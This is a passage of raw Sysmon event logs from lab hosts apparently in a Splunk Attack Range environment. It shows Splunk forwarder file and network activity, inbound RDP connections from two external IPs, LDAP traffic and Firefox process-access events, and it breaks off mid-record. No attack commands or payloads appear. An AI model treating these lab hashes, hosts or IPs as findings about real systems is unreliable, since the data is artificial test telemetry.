AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A0BA2D5F3489844F3458844359C3D9C,SHA256=A976FF42AEF2ACFD03D042DC0EFBDEA809CBA35398963A97309F519A1BED1378,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978055Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:08.830{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=402320DD184A13850F0EF75743F01058,SHA256=5BD3812DB346662BB721084178333DF65AD731206BE1A72EA6E2A14D8714DDD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978054Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:08.830{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39895A90012B8284AC0D4556ACC3B762,SHA256=91EB23D46C085FB9646302A6BEDDC641AAE82228E22F0D20CCD6DE2BC893B2B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978053Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:08.236{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=948F5068E6BB8D8E7025D8896F868FCC,SHA256=97E0DBA6C630B87FDB484881A23320736C1A0C4EE08E40566C87E06767A5C8A0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049435Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:06.747{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53304-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049438Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:09.892{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D860E2A7DA0A6484490C56FEFD75A7C6,SHA256=23F7DA7B30F8F972E267AE5928026698C54596B847013EE70FD6E470F4E032B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978057Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:09.252{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07DAD5614A159E07A79656CAC664C2A9,SHA256=FDF442EC54D5FEFA63B04B80F3C82E813576A6ED5D0672884D8720EE7EC0C893,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049437Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:09.676{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCD6E6189392368AA0FA7A297ECDBCCD,SHA256=39C33020C8958F0F252C061D605BACC3B7ECB2F8A47FB046B6E7D87FBE6FAF76,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978056Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:05.789{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59263-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001049440Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:10.907{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93238898FEA7EBC35FF2C48BAAE5DD1A,SHA256=04FDC7B05B2C49A6C70F5E284CC3C74F01C85BD8F1831AF6D145E48CE5EF293A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978058Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:10.252{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1585DAA03792C9CAB2E208A22E362764,SHA256=0E32DEF13F60C8CFDC58BE92EBE6A72EF356ECA61FBCD8BCDF3363ACC02E023E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049439Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:07.578{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59657-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049441Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:11.939{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E04F9E6BF43470E4A5E8ECFD070E2D7,SHA256=4EBC2FC59AA223303A5BA88506647C29CEAB30520AB9301AC549B83964606B8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978060Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:11.393{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=629BA8266B4D951F0AD93C5DC9D00324,SHA256=E9C0C7A92F5F02953ACA6CE10777E8A67854E5D34BFFBFDB150357CAF7E52381,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978059Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:07.849{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59341-false10.0.1.12-8000- 23542300x80000000000000001049442Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:12.976{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=419306AB231343F293C0B0028626B93B,SHA256=5970A452CE965899B1D04467769666140D90B84BBBC8872081A2747BDE333502,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978061Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:12.611{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6D0796EF9486552182DA81F0A5F6A92,SHA256=858826FF33901BC3BA075BAA446312A55CFA0A22AB5814AD860EE657148608C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978065Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:13.846{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=750BFB421F66A7AAE08A423E09595FF2,SHA256=970300F7588AAB9D01FE12F5597263C48A508EC9426EAD1206FC0809BC30258A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049446Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:13.476{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=34F7D52ECFB612872FA89EC9CD3989E5,SHA256=5A5698D1699A5EFD7AF41998D207F478F4579428E36BA5E9117A8A7CDB2C89A3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049445Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:11.790{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62283-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001049444Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:11.768{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53305-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001049443Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:13.007{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000978064Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:13.596{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978063Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:10.640{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50000-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978062Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:13.361{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=402320DD184A13850F0EF75743F01058,SHA256=5BD3812DB346662BB721084178333DF65AD731206BE1A72EA6E2A14D8714DDD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978066Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:14.908{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=559A0E529FDE92C83584DE24C810298F,SHA256=D59A1E2D28C172FD99217AEA67DC5FF9228F84D5452AE2CE9355D71A18155AA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049449Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:14.738{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5EE10673EC988FC57089D1716F9D8E20,SHA256=80CCDC1EB3C8ABEBE277DE08FD4CEFD89698ADDC484218A54D3D166911631F89,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049448Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:12.238{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62527-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049447Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:14.006{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC53D6722B6FB6C6CB8CF70A011B76B8,SHA256=4ADAD682B5612FF1FAC24058B162DCDCA6E0AB2A5A55E4502DBC47A44245DF50,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978067Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:12.225{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59342-false10.0.1.12-8089- 354300x80000000000000001049451Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:13.116{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-51291-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049450Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:15.024{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18D522C143CF4A549196A522E6A4198B,SHA256=537569BF5A9242A7CADF891314A70472782FDEB13778AE2521BAF33E2B4109CC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978069Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:13.693{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59343-false10.0.1.12-8000- 23542300x8000000000000000978068Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:16.049{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AEFD649ECAAD496F315C8782B4107E5,SHA256=D43F87A1E4BCF295668F06332BECB92FC8F4F6E036E14240B713947871D0E1E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049452Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:16.039{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C6A36351E526B976D4036219E209D61,SHA256=E3BDB9CB7353224FB2F1735364C7F063BE48BB8E951D9ABDC42716B71DA08774,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978070Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:17.284{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC05C27AFA57ECECE8513568BE7C2F02,SHA256=1C18CBDF81022DE11E106DE73E3033167E82E67C3EBF041E02E94FE5F19ECFB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049454Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:17.338{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BFB2643875B268597EC0FDFFB14D56AD,SHA256=891917FD4BBA506143E01E0B54600E657A5440F83759CD679268C85FFC974FC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049453Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:17.057{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C255E9F90DBB2A69EF68256C2946DC6,SHA256=08360C09B4ACD9427189FF3C90DE8D7D11FBD03B26A9E0688DE80275D57FB891,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978073Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:15.601{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-65193-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978072Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:18.330{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3AEBE8771D79AC4DA4C243BF6C6F28E,SHA256=2E304D328AF9CCECDD9A2C2F466A79912E8C03267AD095C87A0966709E1E025A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049457Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:16.016{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53306-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001049456Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:16.016{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53306-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001049455Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:18.075{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=111D1364BFB9073FA368E3ABDD03FFC5,SHA256=E978F5BAC746ACA3E359E43D3B8D764D5FF20D7D5ACC80741B2DD40D77530F8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978071Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:18.268{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2676852F097EEE4D9E3E51F7C25D6B0D,SHA256=5AF754F3EE855ACCCC4B152EEA6A74DE8EEBFABA3C200AA0041BB6DAF52BB39B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978074Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:19.346{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B711DE7F003CF5F4A88BF2448B43C0E,SHA256=193CFD31DB3FADA599445F8E03BB9310F1817E86345F5FC917205922DC714260,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049459Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:17.745{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53307-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049458Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:19.090{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5E79184158D01D13E412B78D71366AF,SHA256=6AA6C54FAB0532AAB7AC25525BFA93C5E6A2C91907951092780D13ED4B34936F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978075Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:20.361{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D5D9EAD4CFC9514E2BA62CD6D2F5167,SHA256=EA50405B5E0419D04BDDBD1500DFDA8B7B9722A9DE0977095AFE86D7542347D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049460Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:20.090{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A941BAB19E279AC4BCA234E5E7FE782,SHA256=EBBEFDE260EA099D2D76F93055069860B5063ED590A7DA0CB2EE3BEF2A6C06EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978077Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:18.818{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59344-false10.0.1.12-8000- 23542300x8000000000000000978076Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:21.361{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3EB59E8B046F2EF38F6E235132197DE,SHA256=DAB326F9229F47335D661CEB3355340C48EAB5BE7E11D88E9A9396E94BBB1041,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049461Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:21.094{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1642C41502FE6BB3428A19BB3430BE4,SHA256=2C612F265E87732306273855351C3F885C9AA0BA3F15E7DE5696FC915A8C0795,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978079Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:22.377{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9DAC2C2A7CC0E00BD37711F4CF4A06A,SHA256=9ECA5CD4E0737AF4680B0604CDB1EB25088FE196F7A2F6ED3D8CE2D948FE3E13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049462Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:22.111{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7471BF6AAC101EBEAD73C08C09C74758,SHA256=BCDCD3876F8E61696F97CEDB6770225D810F35ADC0F718F7448289686466DCC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978078Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:22.174{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0973D4B02BC3D2664D50E706FE24CAF0,SHA256=735CBF58F663C30A1AED298BC4AD5CF89D17D2823E5CCE6308C3119A3750CC73,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049464Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:23.711{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla 